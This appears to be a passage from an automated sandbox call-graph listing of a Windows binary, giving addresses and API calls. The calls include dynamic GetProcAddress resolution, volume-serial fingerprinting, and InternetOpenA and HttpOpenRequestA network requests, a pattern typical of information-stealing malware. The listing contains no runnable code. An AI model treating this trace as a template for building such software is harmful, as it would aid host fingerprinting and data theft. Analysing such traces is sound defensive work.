lstrcpy 13847->13848 13849 486833 13848->13849 13850 48a9b0 4 API calls 13849->13850 13851 486845 13850->13851 13852 48a8a0 lstrcpy 13851->13852 13853 48684e 13852->13853 13854 48a9b0 4 API calls 13853->13854 13855 486867 13854->13855 13856 48a8a0 lstrcpy 13855->13856 13857 486870 13856->13857 13858 48a9b0 4 API calls 13857->13858 13859 48688a 13858->13859 13860 48a8a0 lstrcpy 13859->13860 13861 486893 13860->13861 13862 48a9b0 4 API calls 13861->13862 13863 4868ac 13862->13863 13864 48a8a0 lstrcpy 13863->13864 13865 4868b5 13864->13865 13866 48a9b0 4 API calls 13865->13866 13867 4868cf 13866->13867 13868 48a8a0 lstrcpy 13867->13868 13869 4868d8 13868->13869 13870 48a9b0 4 API calls 13869->13870 13871 4868f3 13870->13871 13872 48a8a0 lstrcpy 13871->13872 13873 4868fc 13872->13873 13874 48a7a0 lstrcpy 13873->13874 13875 486910 13874->13875 13875->13635 13877 48a812 13876->13877 13877->13638 13879 48a83f 13878->13879 13880 485b54 13879->13880 13881 48a87b lstrcpy 13879->13881 13880->13648 13881->13880 13883 48a8a0 lstrcpy 13882->13883 13884 486443 13883->13884 13885 48a8a0 lstrcpy 13884->13885 13886 486455 13885->13886 13887 48a8a0 lstrcpy 13886->13887 13888 486467 13887->13888 13889 48a8a0 lstrcpy 13888->13889 13890 485b86 13889->13890 13890->13654 13892 4745c0 2 API calls 13891->13892 13893 4726b4 13892->13893 13894 4745c0 2 API calls 13893->13894 13895 4726d7 13894->13895 13896 4745c0 2 API calls 13895->13896 13897 4726f0 13896->13897 13898 4745c0 2 API calls 13897->13898 13899 472709 13898->13899 13900 4745c0 2 API calls 13899->13900 13901 472736 13900->13901 13902 4745c0 2 API calls 13901->13902 13903 47274f 13902->13903 13904 4745c0 2 API calls 13903->13904 13905 472768 13904->13905 13906 4745c0 2 API calls 13905->13906 13907 472795 13906->13907 13908 4745c0 2 API calls 13907->13908 13909 4727ae 13908->13909 13910 4745c0 2 API calls 13909->13910 13911 4727c7 13910->13911 13912 4745c0 2 API calls 13911->13912 13913 4727e0 13912->13913 13914 4745c0 2 API calls 13913->13914 13915 4727f9 13914->13915 13916 4745c0 2 API calls 13915->13916 13917 472812 13916->13917 13918 4745c0 2 API calls 13917->13918 13919 47282b 13918->13919 13920 4745c0 2 API calls 13919->13920 13921 472844 13920->13921 13922 4745c0 2 API calls 13921->13922 13923 47285d 13922->13923 13924 4745c0 2 API calls 13923->13924 13925 472876 13924->13925 13926 4745c0 2 API calls 13925->13926 13927 47288f 13926->13927 13928 4745c0 2 API calls 13927->13928 13929 4728a8 13928->13929 13930 4745c0 2 API calls 13929->13930 13931 4728c1 13930->13931 13932 4745c0 2 API calls 13931->13932 13933 4728da 13932->13933 13934 4745c0 2 API calls 13933->13934 13935 4728f3 13934->13935 13936 4745c0 2 API calls 13935->13936 13937 47290c 13936->13937 13938 4745c0 2 API calls 13937->13938 13939 472925 13938->13939 13940 4745c0 2 API calls 13939->13940 13941 47293e 13940->13941 13942 4745c0 2 API calls 13941->13942 13943 472957 13942->13943 13944 4745c0 2 API calls 13943->13944 13945 472970 13944->13945 13946 4745c0 2 API calls 13945->13946 13947 472989 13946->13947 13948 4745c0 2 API calls 13947->13948 13949 4729a2 13948->13949 13950 4745c0 2 API calls 13949->13950 13951 4729bb 13950->13951 13952 4745c0 2 API calls 13951->13952 13953 4729d4 13952->13953 13954 4745c0 2 API calls 13953->13954 13955 4729ed 13954->13955 13956 4745c0 2 API calls 13955->13956 13957 472a06 13956->13957 13958 4745c0 2 API calls 13957->13958 13959 472a1f 13958->13959 13960 4745c0 2 API calls 13959->13960 13961 472a38 13960->13961 13962 4745c0 2 API calls 13961->13962 13963 472a51 13962->13963 13964 4745c0 2 API calls 13963->13964 13965 472a6a 13964->13965 13966 4745c0 2 API calls 13965->13966 13967 472a83 13966->13967 13968 4745c0 2 API calls 13967->13968 13969 472a9c 13968->13969 13970 4745c0 2 API calls 13969->13970 13971 472ab5 13970->13971 13972 4745c0 2 API calls 13971->13972 13973 472ace 13972->13973 13974 4745c0 2 API calls 13973->13974 13975 472ae7 13974->13975 13976 4745c0 2 API calls 13975->13976 13977 472b00 13976->13977 13978 4745c0 2 API calls 13977->13978 13979 472b19 13978->13979 13980 4745c0 2 API calls 13979->13980 13981 472b32 13980->13981 13982 4745c0 2 API calls 13981->13982 13983 472b4b 13982->13983 13984 4745c0 2 API calls 13983->13984 13985 472b64 13984->13985 13986 4745c0 2 API calls 13985->13986 13987 472b7d 13986->13987 13988 4745c0 2 API calls 13987->13988 13989 472b96 13988->13989 13990 4745c0 2 API calls 13989->13990 13991 472baf 13990->13991 13992 4745c0 2 API calls 13991->13992 13993 472bc8 13992->13993 13994 4745c0 2 API calls 13993->13994 13995 472be1 13994->13995 13996 4745c0 2 API calls 13995->13996 13997 472bfa 13996->13997 13998 4745c0 2 API calls 13997->13998 13999 472c13 13998->13999 14000 4745c0 2 API calls 13999->14000 14001 472c2c 14000->14001 14002 4745c0 2 API calls 14001->14002 14003 472c45 14002->14003 14004 4745c0 2 API calls 14003->14004 14005 472c5e 14004->14005 14006 4745c0 2 API calls 14005->14006 14007 472c77 14006->14007 14008 4745c0 2 API calls 14007->14008 14009 472c90 14008->14009 14010 4745c0 2 API calls 14009->14010 14011 472ca9 14010->14011 14012 4745c0 2 API calls 14011->14012 14013 472cc2 14012->14013 14014 4745c0 2 API calls 14013->14014 14015 472cdb 14014->14015 14016 4745c0 2 API calls 14015->14016 14017 472cf4 14016->14017 14018 4745c0 2 API calls 14017->14018 14019 472d0d 14018->14019 14020 4745c0 2 API calls 14019->14020 14021 472d26 14020->14021 14022 4745c0 2 API calls 14021->14022 14023 472d3f 14022->14023 14024 4745c0 2 API calls 14023->14024 14025 472d58 14024->14025 14026 4745c0 2 API calls 14025->14026 14027 472d71 14026->14027 14028 4745c0 2 API calls 14027->14028 14029 472d8a 14028->14029 14030 4745c0 2 API calls 14029->14030 14031 472da3 14030->14031 14032 4745c0 2 API calls 14031->14032 14033 472dbc 14032->14033 14034 4745c0 2 API calls 14033->14034 14035 472dd5 14034->14035 14036 4745c0 2 API calls 14035->14036 14037 472dee 14036->14037 14038 4745c0 2 API calls 14037->14038 14039 472e07 14038->14039 14040 4745c0 2 API calls 14039->14040 14041 472e20 14040->14041 14042 4745c0 2 API calls 14041->14042 14043 472e39 14042->14043 14044 4745c0 2 API calls 14043->14044 14045 472e52 14044->14045 14046 4745c0 2 API calls 14045->14046 14047 472e6b 14046->14047 14048 4745c0 2 API calls 14047->14048 14049 472e84 14048->14049 14050 4745c0 2 API calls 14049->14050 14051 472e9d 14050->14051 14052 4745c0 2 API calls 14051->14052 14053 472eb6 14052->14053 14054 4745c0 2 API calls 14053->14054 14055 472ecf 14054->14055 14056 4745c0 2 API calls 14055->14056 14057 472ee8 14056->14057 14058 4745c0 2 API calls 14057->14058 14059 472f01 14058->14059 14060 4745c0 2 API calls 14059->14060 14061 472f1a 14060->14061 14062 4745c0 2 API calls 14061->14062 14063 472f33 14062->14063 14064 4745c0 2 API calls 14063->14064 14065 472f4c 14064->14065 14066 4745c0 2 API calls 14065->14066 14067 472f65 14066->14067 14068 4745c0 2 API calls 14067->14068 14069 472f7e 14068->14069 14070 4745c0 2 API calls 14069->14070 14071 472f97 14070->14071 14072 4745c0 2 API calls 14071->14072 14073 472fb0 14072->14073 14074 4745c0 2 API calls 14073->14074 14075 472fc9 14074->14075 14076 4745c0 2 API calls 14075->14076 14077 472fe2 14076->14077 14078 4745c0 2 API calls 14077->14078 14079 472ffb 14078->14079 14080 4745c0 2 API calls 14079->14080 14081 473014 14080->14081 14082 4745c0 2 API calls 14081->14082 14083 47302d 14082->14083 14084 4745c0 2 API calls 14083->14084 14085 473046 14084->14085 14086 4745c0 2 API calls 14085->14086 14087 47305f 14086->14087 14088 4745c0 2 API calls 14087->14088 14089 473078 14088->14089 14090 4745c0 2 API calls 14089->14090 14091 473091 14090->14091 14092 4745c0 2 API calls 14091->14092 14093 4730aa 14092->14093 14094 4745c0 2 API calls 14093->14094 14095 4730c3 14094->14095 14096 4745c0 2 API calls 14095->14096 14097 4730dc 14096->14097 14098 4745c0 2 API calls 14097->14098 14099 4730f5 14098->14099 14100 4745c0 2 API calls 14099->14100 14101 47310e 14100->14101 14102 4745c0 2 API calls 14101->14102 14103 473127 14102->14103 14104 4745c0 2 API calls 14103->14104 14105 473140 14104->14105 14106 4745c0 2 API calls 14105->14106 14107 473159 14106->14107 14108 4745c0 2 API calls 14107->14108 14109 473172 14108->14109 14110 4745c0 2 API calls 14109->14110 14111 47318b 14110->14111 14112 4745c0 2 API calls 14111->14112 14113 4731a4 14112->14113 14114 4745c0 2 API calls 14113->14114 14115 4731bd 14114->14115 14116 4745c0 2 API calls 14115->14116 14117 4731d6 14116->14117 14118 4745c0 2 API calls 14117->14118 14119 4731ef 14118->14119 14120 4745c0 2 API calls 14119->14120 14121 473208 14120->14121 14122 4745c0 2 API calls 14121->14122 14123 473221 14122->14123 14124 4745c0 2 API calls 14123->14124 14125 47323a 14124->14125 14126 4745c0 2 API calls 14125->14126 14127 473253 14126->14127 14128 4745c0 2 API calls 14127->14128 14129 47326c 14128->14129 14130 4745c0 2 API calls 14129->14130 14131 473285 14130->14131 14132 4745c0 2 API calls 14131->14132 14133 47329e 14132->14133 14134 4745c0 2 API calls 14133->14134 14135 4732b7 14134->14135 14136 4745c0 2 API calls 14135->14136 14137 4732d0 14136->14137 14138 4745c0 2 API calls 14137->14138 14139 4732e9 14138->14139 14140 4745c0 2 API calls 14139->14140 14141 473302 14140->14141 14142 4745c0 2 API calls 14141->14142 14143 47331b 14142->14143 14144 4745c0 2 API calls 14143->14144 14145 473334 14144->14145 14146 4745c0 2 API calls 14145->14146 14147 47334d 14146->14147 14148 4745c0 2 API calls 14147->14148 14149 473366 14148->14149 14150 4745c0 2 API calls 14149->14150 14151 47337f 14150->14151 14152 4745c0 2 API calls 14151->14152 14153 473398 14152->14153 14154 4745c0 2 API calls 14153->14154 14155 4733b1 14154->14155 14156 4745c0 2 API calls 14155->14156 14157 4733ca 14156->14157 14158 4745c0 2 API calls 14157->14158 14159 4733e3 14158->14159 14160 4745c0 2 API calls 14159->14160 14161 4733fc 14160->14161 14162 4745c0 2 API calls 14161->14162 14163 473415 14162->14163 14164 4745c0 2 API calls 14163->14164 14165 47342e 14164->14165 14166 4745c0 2 API calls 14165->14166 14167 473447 14166->14167 14168 4745c0 2 API calls 14167->14168 14169 473460 14168->14169 14170 4745c0 2 API calls 14169->14170 14171 473479 14170->14171 14172 4745c0 2 API calls 14171->14172 14173 473492 14172->14173 14174 4745c0 2 API calls 14173->14174 14175 4734ab 14174->14175 14176 4745c0 2 API calls 14175->14176 14177 4734c4 14176->14177 14178 4745c0 2 API calls 14177->14178 14179 4734dd 14178->14179 14180 4745c0 2 API calls 14179->14180 14181 4734f6 14180->14181 14182 4745c0 2 API calls 14181->14182 14183 47350f 14182->14183 14184 4745c0 2 API calls 14183->14184 14185 473528 14184->14185 14186 4745c0 2 API calls 14185->14186 14187 473541 14186->14187 14188 4745c0 2 API calls 14187->14188 14189 47355a 14188->14189 14190 4745c0 2 API calls 14189->14190 14191 473573 14190->14191 14192 4745c0 2 API calls 14191->14192 14193 47358c 14192->14193 14194 4745c0 2 API calls 14193->14194 14195 4735a5 14194->14195 14196 4745c0 2 API calls 14195->14196 14197 4735be 14196->14197 14198 4745c0 2 API calls 14197->14198 14199 4735d7 14198->14199 14200 4745c0 2 API calls 14199->14200 14201 4735f0 14200->14201 14202 4745c0 2 API calls 14201->14202 14203 473609 14202->14203 14204 4745c0 2 API calls 14203->14204 14205 473622 14204->14205 14206 4745c0 2 API calls 14205->14206 14207 47363b 14206->14207 14208 4745c0 2 API calls 14207->14208 14209 473654 14208->14209 14210 4745c0 2 API calls 14209->14210 14211 47366d 14210->14211 14212 4745c0 2 API calls 14211->14212 14213 473686 14212->14213 14214 4745c0 2 API calls 14213->14214 14215 47369f 14214->14215 14216 4745c0 2 API calls 14215->14216 14217 4736b8 14216->14217 14218 4745c0 2 API calls 14217->14218 14219 4736d1 14218->14219 14220 4745c0 2 API calls 14219->14220 14221 4736ea 14220->14221 14222 4745c0 2 API calls 14221->14222 14223 473703 14222->14223 14224 4745c0 2 API calls 14223->14224 14225 47371c 14224->14225 14226 4745c0 2 API calls 14225->14226 14227 473735 14226->14227 14228 4745c0 2 API calls 14227->14228 14229 47374e 14228->14229 14230 4745c0 2 API calls 14229->14230 14231 473767 14230->14231 14232 4745c0 2 API calls 14231->14232 14233 473780 14232->14233 14234 4745c0 2 API calls 14233->14234 14235 473799 14234->14235 14236 4745c0 2 API calls 14235->14236 14237 4737b2 14236->14237 14238 4745c0 2 API calls 14237->14238 14239 4737cb 14238->14239 14240 4745c0 2 API calls 14239->14240 14241 4737e4 14240->14241 14242 4745c0 2 API calls 14241->14242 14243 4737fd 14242->14243 14244 4745c0 2 API calls 14243->14244 14245 473816 14244->14245 14246 4745c0 2 API calls 14245->14246 14247 47382f 14246->14247 14248 4745c0 2 API calls 14247->14248 14249 473848 14248->14249 14250 4745c0 2 API calls 14249->14250 14251 473861 14250->14251 14252 4745c0 2 API calls 14251->14252 14253 47387a 14252->14253 14254 4745c0 2 API calls 14253->14254 14255 473893 14254->14255 14256 4745c0 2 API calls 14255->14256 14257 4738ac 14256->14257 14258 4745c0 2 API calls 14257->14258 14259 4738c5 14258->14259 14260 4745c0 2 API calls 14259->14260 14261 4738de 14260->14261 14262 4745c0 2 API calls 14261->14262 14263 4738f7 14262->14263 14264 4745c0 2 API calls 14263->14264 14265 473910 14264->14265 14266 4745c0 2 API calls 14265->14266 14267 473929 14266->14267 14268 4745c0 2 API calls 14267->14268 14269 473942 14268->14269 14270 4745c0 2 API calls 14269->14270 14271 47395b 14270->14271 14272 4745c0 2 API calls 14271->14272 14273 473974 14272->14273 14274 4745c0 2 API calls 14273->14274 14275 47398d 14274->14275 14276 4745c0 2 API calls 14275->14276 14277 4739a6 14276->14277 14278 4745c0 2 API calls 14277->14278 14279 4739bf 14278->14279 14280 4745c0 2 API calls 14279->14280 14281 4739d8 14280->14281 14282 4745c0 2 API calls 14281->14282 14283 4739f1 14282->14283 14284 4745c0 2 API calls 14283->14284 14285 473a0a 14284->14285 14286 4745c0 2 API calls 14285->14286 14287 473a23 14286->14287 14288 4745c0 2 API calls 14287->14288 14289 473a3c 14288->14289 14290 4745c0 2 API calls 14289->14290 14291 473a55 14290->14291 14292 4745c0 2 API calls 14291->14292 14293 473a6e 14292->14293 14294 4745c0 2 API calls 14293->14294 14295 473a87 14294->14295 14296 4745c0 2 API calls 14295->14296 14297 473aa0 14296->14297 14298 4745c0 2 API calls 14297->14298 14299 473ab9 14298->14299 14300 4745c0 2 API calls 14299->14300 14301 473ad2 14300->14301 14302 4745c0 2 API calls 14301->14302 14303 473aeb 14302->14303 14304 4745c0 2 API calls 14303->14304 14305 473b04 14304->14305 14306 4745c0 2 API calls 14305->14306 14307 473b1d 14306->14307 14308 4745c0 2 API calls 14307->14308 14309 473b36 14308->14309 14310 4745c0 2 API calls 14309->14310 14311 473b4f 14310->14311 14312 4745c0 2 API calls 14311->14312 14313 473b68 14312->14313 14314 4745c0 2 API calls 14313->14314 14315 473b81 14314->14315 14316 4745c0 2 API calls 14315->14316 14317 473b9a 14316->14317 14318 4745c0 2 API calls 14317->14318 14319 473bb3 14318->14319 14320 4745c0 2 API calls 14319->14320 14321 473bcc 14320->14321 14322 4745c0 2 API calls 14321->14322 14323 473be5 14322->14323 14324 4745c0 2 API calls 14323->14324 14325 473bfe 14324->14325 14326 4745c0 2 API calls 14325->14326 14327 473c17 14326->14327 14328 4745c0 2 API calls 14327->14328 14329 473c30 14328->14329 14330 4745c0 2 API calls 14329->14330 14331 473c49 14330->14331 14332 4745c0 2 API calls 14331->14332 14333 473c62 14332->14333 14334 4745c0 2 API calls 14333->14334 14335 473c7b 14334->14335 14336 4745c0 2 API calls 14335->14336 14337 473c94 14336->14337 14338 4745c0 2 API calls 14337->14338 14339 473cad 14338->14339 14340 4745c0 2 API calls 14339->14340 14341 473cc6 14340->14341 14342 4745c0 2 API calls 14341->14342 14343 473cdf 14342->14343 14344 4745c0 2 API calls 14343->14344 14345 473cf8 14344->14345 14346 4745c0 2 API calls 14345->14346 14347 473d11 14346->14347 14348 4745c0 2 API calls 14347->14348 14349 473d2a 14348->14349 14350 4745c0 2 API calls 14349->14350 14351 473d43 14350->14351 14352 4745c0 2 API calls 14351->14352 14353 473d5c 14352->14353 14354 4745c0 2 API calls 14353->14354 14355 473d75 14354->14355 14356 4745c0 2 API calls 14355->14356 14357 473d8e 14356->14357 14358 4745c0 2 API calls 14357->14358 14359 473da7 14358->14359 14360 4745c0 2 API calls 14359->14360 14361 473dc0 14360->14361 14362 4745c0 2 API calls 14361->14362 14363 473dd9 14362->14363 14364 4745c0 2 API calls 14363->14364 14365 473df2 14364->14365 14366 4745c0 2 API calls 14365->14366 14367 473e0b 14366->14367 14368 4745c0 2 API calls 14367->14368 14369 473e24 14368->14369 14370 4745c0 2 API calls 14369->14370 14371 473e3d 14370->14371 14372 4745c0 2 API calls 14371->14372 14373 473e56 14372->14373 14374 4745c0 2 API calls 14373->14374 14375 473e6f 14374->14375 14376 4745c0 2 API calls 14375->14376 14377 473e88 14376->14377 14378 4745c0 2 API calls 14377->14378 14379 473ea1 14378->14379 14380 4745c0 2 API calls 14379->14380 14381 473eba 14380->14381 14382 4745c0 2 API calls 14381->14382 14383 473ed3 14382->14383 14384 4745c0 2 API calls 14383->14384 14385 473eec 14384->14385 14386 4745c0 2 API calls 14385->14386 14387 473f05 14386->14387 14388 4745c0 2 API calls 14387->14388 14389 473f1e 14388->14389 14390 4745c0 2 API calls 14389->14390 14391 473f37 14390->14391 14392 4745c0 2 API calls 14391->14392 14393 473f50 14392->14393 14394 4745c0 2 API calls 14393->14394 14395 473f69 14394->14395 14396 4745c0 2 API calls 14395->14396 14397 473f82 14396->14397 14398 4745c0 2 API calls 14397->14398 14399 473f9b 14398->14399 14400 4745c0 2 API calls 14399->14400 14401 473fb4 14400->14401 14402 4745c0 2 API calls 14401->14402 14403 473fcd 14402->14403 14404 4745c0 2 API calls 14403->14404 14405 473fe6 14404->14405 14406 4745c0 2 API calls 14405->14406 14407 473fff 14406->14407 14408 4745c0 2 API calls 14407->14408 14409 474018 14408->14409 14410 4745c0 2 API calls 14409->14410 14411 474031 14410->14411 14412 4745c0 2 API calls 14411->14412 14413 47404a 14412->14413 14414 4745c0 2 API calls 14413->14414 14415 474063 14414->14415 14416 4745c0 2 API calls 14415->14416 14417 47407c 14416->14417 14418 4745c0 2 API calls 14417->14418 14419 474095 14418->14419 14420 4745c0 2 API calls 14419->14420 14421 4740ae 14420->14421 14422 4745c0 2 API calls 14421->14422 14423 4740c7 14422->14423 14424 4745c0 2 API calls 14423->14424 14425 4740e0 14424->14425 14426 4745c0 2 API calls 14425->14426 14427 4740f9 14426->14427 14428 4745c0 2 API calls 14427->14428 14429 474112 14428->14429 14430 4745c0 2 API calls 14429->14430 14431 47412b 14430->14431 14432 4745c0 2 API calls 14431->14432 14433 474144 14432->14433 14434 4745c0 2 API calls 14433->14434 14435 47415d 14434->14435 14436 4745c0 2 API calls 14435->14436 14437 474176 14436->14437 14438 4745c0 2 API calls 14437->14438 14439 47418f 14438->14439 14440 4745c0 2 API calls 14439->14440 14441 4741a8 14440->14441 14442 4745c0 2 API calls 14441->14442 14443 4741c1 14442->14443 14444 4745c0 2 API calls 14443->14444 14445 4741da 14444->14445 14446 4745c0 2 API calls 14445->14446 14447 4741f3 14446->14447 14448 4745c0 2 API calls 14447->14448 14449 47420c 14448->14449 14450 4745c0 2 API calls 14449->14450 14451 474225 14450->14451 14452 4745c0 2 API calls 14451->14452 14453 47423e 14452->14453 14454 4745c0 2 API calls 14453->14454 14455 474257 14454->14455 14456 4745c0 2 API calls 14455->14456 14457 474270 14456->14457 14458 4745c0 2 API calls 14457->14458 14459 474289 14458->14459 14460 4745c0 2 API calls 14459->14460 14461 4742a2 14460->14461 14462 4745c0 2 API calls 14461->14462 14463 4742bb 14462->14463 14464 4745c0 2 API calls 14463->14464 14465 4742d4 14464->14465 14466 4745c0 2 API calls 14465->14466 14467 4742ed 14466->14467 14468 4745c0 2 API calls 14467->14468 14469 474306 14468->14469 14470 4745c0 2 API calls 14469->14470 14471 47431f 14470->14471 14472 4745c0 2 API calls 14471->14472 14473 474338 14472->14473 14474 4745c0 2 API calls 14473->14474 14475 474351 14474->14475 14476 4745c0 2 API calls 14475->14476 14477 47436a 14476->14477 14478 4745c0 2 API calls 14477->14478 14479 474383 14478->14479 14480 4745c0 2 API calls 14479->14480 14481 47439c 14480->14481 14482 4745c0 2 API calls 14481->14482 14483 4743b5 14482->14483 14484 4745c0 2 API calls 14483->14484 14485 4743ce 14484->14485 14486 4745c0 2 API calls 14485->14486 14487 4743e7 14486->14487 14488 4745c0 2 API calls 14487->14488 14489 474400 14488->14489 14490 4745c0 2 API calls 14489->14490 14491 474419 14490->14491 14492 4745c0 2 API calls 14491->14492 14493 474432 14492->14493 14494 4745c0 2 API calls 14493->14494 14495 47444b 14494->14495 14496 4745c0 2 API calls 14495->14496 14497 474464 14496->14497 14498 4745c0 2 API calls 14497->14498 14499 47447d 14498->14499 14500 4745c0 2 API calls 14499->14500 14501 474496 14500->14501 14502 4745c0 2 API calls 14501->14502 14503 4744af 14502->14503 14504 4745c0 2 API calls 14503->14504 14505 4744c8 14504->14505 14506 4745c0 2 API calls 14505->14506 14507 4744e1 14506->14507 14508 4745c0 2 API calls 14507->14508 14509 4744fa 14508->14509 14510 4745c0 2 API calls 14509->14510 14511 474513 14510->14511 14512 4745c0 2 API calls 14511->14512 14513 47452c 14512->14513 14514 4745c0 2 API calls 14513->14514 14515 474545 14514->14515 14516 4745c0 2 API calls 14515->14516 14517 47455e 14516->14517 14518 4745c0 2 API calls 14517->14518 14519 474577 14518->14519 14520 4745c0 2 API calls 14519->14520 14521 474590 14520->14521 14522 4745c0 2 API calls 14521->14522 14523 4745a9 14522->14523 14524 489c10 14523->14524 14525 489c20 43 API calls 14524->14525 14526 48a036 8 API calls 14524->14526 14525->14526 14527 48a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14526->14527 14528 48a146 14526->14528 14527->14528 14529 48a153 8 API calls 14528->14529 14530 48a216 14528->14530 14529->14530 14531 48a298 14530->14531 14532 48a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14530->14532 14533 48a2a5 6 API calls 14531->14533 14534 48a337 14531->14534 14532->14531 14533->14534 14535 48a41f 14534->14535 14536 48a344 9 API calls 14534->14536 14537 48a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14535->14537 14538 48a4a2 14535->14538 14536->14535 14537->14538 14539 48a4ab GetProcAddress GetProcAddress 14538->14539 14540 48a4dc 14538->14540 14539->14540 14541 48a515 14540->14541 14542 48a4e5 GetProcAddress GetProcAddress 14540->14542 14543 48a612 14541->14543 14544 48a522 10 API calls 14541->14544 14542->14541 14545 48a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14543->14545 14546 48a67d 14543->14546 14544->14543 14545->14546 14547 48a69e 14546->14547 14548 48a686 GetProcAddress 14546->14548 14549 485ca3 14547->14549 14550 48a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14547->14550 14548->14547 14551 471590 14549->14551 14550->14549 15672 471670 14551->15672 14554 48a7a0 lstrcpy 14555 4715b5 14554->14555 14556 48a7a0 lstrcpy 14555->14556 14557 4715c7 14556->14557 14558 48a7a0 lstrcpy 14557->14558 14559 4715d9 14558->14559 14560 48a7a0 lstrcpy 14559->14560 14561 471663 14560->14561 14562 485510 14561->14562 14563 485521 14562->14563 14564 48a820 2 API calls 14563->14564 14565 48552e 14564->14565 14566 48a820 2 API calls 14565->14566 14567 48553b 14566->14567 14568 48a820 2 API calls 14567->14568 14569 485548 14568->14569 14570 48a740 lstrcpy 14569->14570 14571 485555 14570->14571 14572 48a740 lstrcpy 14571->14572 14573 485562 14572->14573 14574 48a740 lstrcpy 14573->14574 14575 48556f 14574->14575 14576 48a740 lstrcpy 14575->14576 14581 48557c 14576->14581 14577 485643 StrCmpCA 14577->14581 14578 4856a0 StrCmpCA 14579 4857dc 14578->14579 14578->14581 14580 48a8a0 lstrcpy 14579->14580 14582 4857e8 14580->14582 14581->14577 14581->14578 14584 48a820 lstrlen lstrcpy 14581->14584 14586 485856 StrCmpCA 14581->14586 14589 48a740 lstrcpy 14581->14589 14590 48a7a0 lstrcpy 14581->14590 14595 471590 lstrcpy 14581->14595 14598 485a0b StrCmpCA 14581->14598 14599 4852c0 25 API calls 14581->14599 14600 4851f0 20 API calls 14581->14600 14606 48a8a0 lstrcpy 14581->14606 14612 48578a StrCmpCA 14581->14612 14615 48593f StrCmpCA 14581->14615 14583 48a820 2 API calls 14582->14583 14585 4857f6 14583->14585 14584->14581 14587 48a820 2 API calls 14585->14587 14586->14581 14588 485991 14586->14588 14592 485805 14587->14592 14591 48a8a0 lstrcpy 14588->14591 14589->14581 14590->14581 14593 48599d 14591->14593 14594 471670 lstrcpy 14592->14594 14596 48a820 2 API calls 14593->14596 14616 485811 14594->14616 14595->14581 14597 4859ab 14596->14597 14601 48a820 2 API calls 14597->14601 14602 485a28 14598->14602 14603 485a16 Sleep 14598->14603 14599->14581 14600->14581 14604 4859ba 14601->14604 14605 48a8a0 lstrcpy 14602->14605 14603->14581 14607 471670 lstrcpy 14604->14607 14608 485a34 14605->14608 14606->14581 14607->14616 14609 48a820 2 API calls 14608->14609 14610 485a43 14609->14610 14611 48a820 2 API calls 14610->14611 14613 485a52 14611->14613 14612->14581 14614 471670 lstrcpy 14613->14614 14614->14616 14615->14581 14616->13669 14618 48754c 14617->14618 14619 487553 GetVolumeInformationA 14617->14619 14618->14619 14620 487591 14619->14620 14621 4875fc GetProcessHeap RtlAllocateHeap 14620->14621 14622 487628 wsprintfA 14621->14622 14623 487619 14621->14623 14624 48a740 lstrcpy 14622->14624 14625 48a740 lstrcpy 14623->14625 14626 485da7 14624->14626 14625->14626 14626->13690 14628 48a7a0 lstrcpy 14627->14628 14629 474899 14628->14629 15681 4747b0 14629->15681 14631 4748a5 14632 48a740 lstrcpy 14631->14632 14633 4748d7 14632->14633 14634 48a740 lstrcpy 14633->14634 14635 4748e4 14634->14635 14636 48a740 lstrcpy 14635->14636 14637 4748f1 14636->14637 14638 48a740 lstrcpy 14637->14638 14639 4748fe 14638->14639 14640 48a740 lstrcpy 14639->14640 14641 47490b InternetOpenA StrCmpCA 14640->14641 14642 474944 14641->14642 14643 474ecb InternetCloseHandle 14642->14643 15687 488b60 14642->15687 14645 474ee8 14643->14645 15702 479ac0 CryptStringToBinaryA 14645->15702 14646 474963 15695 48a920 14646->15695 14649 474976 14651 48a8a0 lstrcpy 14649->14651 14656 47497f 14651->14656 14652 48a820 2 API calls 14653 474f05 14652->14653 14655 48a9b0 4 API calls 14653->14655 14654 474f27 ctype 14658 48a7a0 lstrcpy 14654->14658 14657 474f1b 14655->14657 14660 48a9b0 4 API calls 14656->14660 14659 48a8a0 lstrcpy 14657->14659 14671 474f57 14658->14671 14659->14654 14661 4749a9 14660->14661 14662 48a8a0 lstrcpy 14661->14662 14663 4749b2 14662->14663 14664 48a9b0 4 API calls 14663->14664 14665 4749d1 14664->14665 14666 48a8a0 lstrcpy 14665->14666 14667 4749da 14666->14667 14668 48a920 3 API calls 14667->14668 14669 4749f8 14668->14669 14670 48a8a0 lstrcpy 14669->14670 14672 474a01 14670->14672 14671->13693 14673 48a9b0 4 API calls 14672->14673 14674 474a20 14673->14674 14675 48a8a0 lstrcpy 14674->14675 14676 474a29 14675->14676 14677 48a9b0 4 API calls 14676->14677 14678 474a48 14677->14678 14679 48a8a0 lstrcpy 14678->14679 14680 474a51 14679->14680 14681 48a9b0 4 API calls 14680->14681 14682 474a7d 14681->14682 14683 48a920 3 API calls 14682->14683 14684 474a84 14683->14684 14685 48a8a0 lstrcpy 14684->14685 14686 474a8d 14685->14686 14687 474aa3 InternetConnectA 14686->14687 14687->14643 14688 474ad3 HttpOpenRequestA 14687->14688 14690 474ebe InternetCloseHandle 14688->14690 14691 474b28 14688->14691 14690->14643 14692 48a9b0 4 API calls 14691->14692 14693 474b3c 14692->14693 14694 48a8a0 lstrcpy 14693->14694 14695 474b45 14694->14695 14696 48a920 3 API calls 14695->14696 14697 474b63 14696->14697 14698 48a8a0 lstrcpy 14697->14698 14699 474b6c 14698->14699 14700 48a9b0 4 API calls 14699->14700 14701 474b8b 14700->14701 14702 48a8a0 lstrcpy 14701->14702 14703 474b94 14702->14703 14704 48a9b0 4 API calls 14703->14704 14705 474bb5 14704->14705 14706 48a8a0 lstrcpy 14705->14706 14707 474bbe 14706->14707 14708 48a9b0 4 API calls 14707->14708 14709 474bde 14708->14709 14710 48a8a0 lstrcpy 14709->14710 14711 474be7 14710->14711 14712 48a9b0 4 API calls 14711->14712 14713 474c06 14712->14713 14714 48a8a0 lstrcpy 14713->14714 14715 474c0f 14714->14715 14716 48a920 3 API calls 14715->14716 14717 474c2d 14716->14717 14718 48a8a0 lstrcpy 14717->14718 14719 474c36 14718->14719 14720 48a9b0 4 API calls 14719->14720 14721 474c55 14720->14721 14722 48a8a0 lstrcpy 14721->14722 14723 474c5e 14722->14723 14724 48a9b0 4 API calls 14723->14724 14725 474c7d 14724->14725 14726 48a8a0 lstrcpy 14725->14726 14727 474c86 14726->14727 14728 48a920 3 API calls 14727->14728 14729 474ca4 14728->14729 14730 48a8a0 